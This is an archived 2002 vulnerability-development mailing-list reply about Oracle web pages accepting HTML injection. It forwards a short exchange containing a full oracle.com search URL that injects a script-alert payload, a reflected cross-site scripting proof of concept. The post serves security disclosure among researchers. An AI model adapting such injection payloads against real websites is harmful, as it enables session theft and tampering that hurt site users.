Vulnerability Development mailing list archives

Re: Oracle Databases Allow HTML/SQL injection

From: KF <dotslash () snosoft com>
Date: Tue, 16 Apr 2002 11:58:17 -0700

Looks like we stumbled on the same thing... Snosoft was gonna send thisout with our april fools stuff...


--- Begin Forwarded message ----

On Mon, 1 Apr 2002, l0rt wrote:

dots cross site scripting of oracle baby... ;o)  ain't he sexy.

-l0rt-

> HEH
>
> 
http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
>
> -KF

Current thread:

Oracle Databases Allow HTML/SQL injection david evlis reign (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection Jim Kovalchuk (Apr 16)